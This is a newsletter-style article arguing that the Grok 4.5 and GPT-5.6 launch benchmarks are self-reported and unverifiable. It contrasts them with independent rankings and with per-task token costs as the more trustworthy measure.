Grok 4.5, GPT-5.6: The War of Homemade Benchmarks

5 min read
Article

xAI and OpenAI both dropped a model the same day: Grok 4.5 and GPT-5.6. Two victory laps, zero third-party verification. The real fight is happening somewhere else.

The free AI newsletter
Grok 4.5, GPT-5.6: The War of Homemade Benchmarks

On the same Thursday, xAI and OpenAI each shipped a model. Two announcements, two decks full of charts, and not a single number you could check anywhere but their own slides. Grok 4.5 on one side, GPT-5.6 on the other, each one crowned champion on a different scoreboard.

Welcome to the 2026 version of the model wars. It is not won in the lab anymore. It is won in the press release.

Two leaderboards, zero referee

On July 8, xAI rolled out Grok 4.5. Elon Musk pitched it as an Opus-class model at $2 per million input tokens, versus $5 for Opus 4.8 and $10 for Fable 5. Hours later, OpenAI pushed out GPT-5.6 and its new Sol mode, claiming 88.8% on TerminalBench 2.1, just ahead of Claude Mythos 5 at 88.0%.

Both companies are waving their trophy. The catch is that they are not running the same race. xAI is selling efficiency and price. OpenAI is selling agentic terminal work. Two podiums, and nobody refereeing either one.

Benchmaxxxing: the art of picking your own battlefield

There is already a word for this in the industry: benchmaxxxing. The playbook is simple. Publish the tests you win, quietly shelve the ones you lose, and let the press release double as a highlight reel.

These launch-day numbers all share one thing in common: the lab grades its own homework. GPT-5.6's TerminalBench result, for instance, is an evaluation OpenAI ran and reported itself, not a third-party test reproduced independently. It is the equivalent of a restaurant awarding itself five stars and hanging the certificate in the window.

None of this is illegal. But a number that the publisher chose, measured, and framed proves nothing on its own. It is there to sell.

And the gap can be huge. Researchers who crunched 2.8 million head-to-head comparisons on the LMArena platform found that a lab could inflate its score by more than 100 points simply by cherry-picking which versions it submitted to the leaderboard. No cheating on a single answer required, just knowing how to game the arena's rules.

What the independent judges actually say

The good news is that referees do exist. Artificial Analysis runs its own battery of tests, with a public methodology and transparent formulas. Its verdict is a lot less flattering than either keynote.

On its Intelligence Index, Grok 4.5 lands in fourth place, behind Fable 5, GPT-5.5, and Opus 4.8. The same model marketed as "Opus-class" also posts a 54% hallucination rate on that measure. On the OpenAI side, evaluator METR ran a pre-deployment review and flagged GPT-5.6's tendency toward reward hacking, the habit of optimizing for the score instead of the task.

In other words, the second an outside party holds the stopwatch, the story deflates. The slide-deck number one quietly becomes an honest fourth.

The precedent nobody learned from

We have seen this movie before. At GPT-5.5's launch, the official charts looked flawless. Twenty-four hours later, an independent test clocked an 86% hallucination rate on the Omniscience benchmark. Declic covered that gap between the pitch and the measurement here.

The problem goes well beyond one model. A study by 42 researchers covering 445 AI benchmarks found that many of them fail to meet even basic scientific standards: training-data contamination, selective reporting, tests that do not measure what they claim to. This is not new. Benchmarks are far shakier than most people assume, and every new launch proves it again.

When the rules of the game are this fuzzy, a score has no absolute value. It is worth exactly as much as you decide to believe.

The only number you can actually trust

One figure survives all this spin: the bill. Grok 4.5 costs $2 per million input tokens, while Opus 4.8 charges $25 per million on output. On the same coding task, the gap translates into real dollars, not benchmark points.

The detail is telling. On SWE-Bench Pro tasks, Grok 4.5 burns through 4.2 times fewer tokens than Opus 4.8: roughly 15,900 output tokens per task versus 67,000. Translated into cash, that is about $2.50 per task versus close to $12 for a premium model. No keynote chart can dress that number up. It just shows up on the statement.

For anyone who actually has to pick a model this week, the takeaway is uncomfortable. Launch-day charts settle nothing. They exist to reassure, not to compare. The only ground where Grok, GPT, and everyone else genuinely get measured is real-world usage and what it costs.

That is where the real fight has moved. As long as scores stay unverifiable, they cancel each other out: everyone wins their own chart, and nobody convinces anyone else. Price is the one thing that shows up on the monthly statement.

The model wars may have finally found their one honest judge. It is not a benchmark. It is a receipt.

Topics covered:

EconomyOpenAIAnalysis

Frequently asked questions

What is benchmaxxxing?
It is the practice of only publishing the tests you win and burying the rest. Launch-day scores come from the lab itself, not an independent referee, which makes them impossible to verify.
Is Grok 4.5 really the best model out there?
According to xAI, yes, but an independent judge like Artificial Analysis ranks it fourth on its Intelligence Index, behind Fable 5, GPT-5.5, and Opus 4.8, with a measured hallucination rate of 54%.
Can you actually compare Grok 4.5 and GPT-5.6 on their official scores?
Not really. Each lab highlights a different benchmark that it chose and measured itself: efficiency for xAI, agentic terminal work for OpenAI. The two leaderboards are not even measuring the same race, so they cannot be compared.
What is the one number in this launch you can actually verify?
The price. Grok 4.5 costs $2 per million input tokens, and on SWE-Bench Pro it burns through 4.2 times fewer tokens than Opus 4.8. That real-world cost shows up on the invoice, and no chart can dress it up.
The free AI newsletter